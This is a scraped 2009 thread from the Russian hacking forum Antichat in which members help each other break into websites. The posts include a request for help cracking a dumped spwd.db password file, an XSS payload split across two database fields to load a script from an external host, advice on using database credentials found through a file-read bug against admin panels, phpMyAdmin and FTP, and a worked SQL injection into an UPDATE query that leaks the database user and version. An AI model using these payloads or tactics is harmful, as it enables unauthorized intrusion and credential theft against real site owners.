Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.12.2009, 00:06
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
слил файлик spwd.db
чем посоветуете выдрать логины и пароли и чем их лучше брутить??
З.Ы. если есть брутер для GPU типа PasswordsPro с лекарством, скиньте плиз ссылку в пм
|
|
|
05.12.2009, 00:07
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Сообщение от warlok
Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
Код:
<script>alert('x')// (Password: </script>
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
Код:
<script src="http:/* (Password: *///1.ru:73/1.js">
но скрипт то невыполняеться при таких условиях  Так попробуй:
<script src="http:<!-- (Password: -->//1.ru:73/1.js">
|
|
|
|
05.12.2009, 00:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
если в JETDATABASE DRIVER есть скул на http header можно ли произвести инъекцию каким нибудь прогой? Например на referrer
|
|
|
|
05.12.2009, 13:36
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Уважаемые Гуру, есть у меня один ну почти ламерский, расстраивающий меня вопрос. Нашел на сайте чтение файлов через readfile хочу шелл. Вначале о хорошем - уязвимость выводит и списки файлов в директориях.
Теперь о плохом. Во первых настройки пхп читать все что в голову взбредет не позволяют, только из нескольких папок. На сайте довольно много субдоменов но все абсолютно однотипные(кроме парочки). Нашел пхп скрипты с паролями-явками от БД - с наружи подключиться нельзя, других сайтов на сервере нету. Почитал несколько пхп файлов, но и в них ничего интереснее хсс пассивной не нашел. Теперь творческий кризис - не продолжать же методом научного тыка читать все файлы и искать инклюд или иньекцию, может есть какие-то другие варианты?
|
|
|
|
05.12.2009, 13:50
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Конфиги с явками и паролями, тыкать пароли на всё что можно или искать баги позволяющие сделать что-то более существенное в коде.
Тоесть простая читалка без дополнений не даст тебе ничего кроме очевидного -- чтения файлов.
Ищи админки, пыхадмины, возможно пароль от админки не в базе а в файле, тогда туда можно попасть, в пыхадмин тоже можно попасть пасс к БД у тебя есть, вопрос какая там авторизация стоит. Ну и т.д.
Вобщем читай )
|
|
|
|
05.12.2009, 14:05
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Про пхпмайадмин спасибо, вот это я точно запамятовал. Пока не нашел его, но мб мне повезет. Зато уже третий набор логин-пароль от БД нашел. Есть еще надежда найти sql иньекцию - ибо судя по другим скриптам, те, кто писали этот сайт оч верят в intval. Буду продолжать искать, чую логи у сервера сегодня хорошо разрастутся. Надо попробовать еще с этими пассами по фтп подключаться, вдруг повезет.
|
|
|
|
05.12.2009, 16:06
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от [ DSU ]
что за бд?
Если Oracle там можно использовать конструкции по типу
Update table set column=(select user from dual)
К сожалению mysql... Есть какие-нибудь другие способы вывести данные?)
Последний раз редактировалось [R]eD; 05.12.2009 в 16:09..
|
|
|
|
05.12.2009, 16:24
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от [R]eD
К сожалению mysql... Есть какие-нибудь другие способы вывести данные?)
почему к сожалению?
|
|
|
|
05.12.2009, 16:24
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от [R]eD
Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например
Код:
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx. Очень просто, к примеру запрос:
Код:
...
mysql_query("UPDATE `news` SET `title` = '".$_POST['title']."', 'text' = '".$_POST['text']."' ");
...
При вводе
Title
Text:
запрос в БД будет
Код:
UPDATE `news` SET `title` = 'test title', `text` = 'test text'
Если же сделать такой ввод:
Title
Код:
test title', `text` = concat_ws(0x3a,user(),database(),version())/*
Text:
В БД пойдет запрос:
Код:
UPDATE `news` SET `title` = 'test title', `text` = concat_ws(0x3a,user(),database(),version())/*', `text` = 'test text'
И в тексте новости будет юзер, бд и версия.
PS: Это будет работать при magic_qoutes = Off.
|
|
|
|
05.12.2009, 18:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от L I G A
2mailbrush
Код:
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
у него в запрос станет:
Код:
`text` = 'concat_ws(0x3a,user(),database(),version())/*' ...
И в тексте новости будет:
concat_ws(0x3a,user(),database(),version())/*
Почему у него в запрос должны стать кавычки? Откуда они взялись там?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.gif){kind=avatar}
Похожие темы
Линейный вид
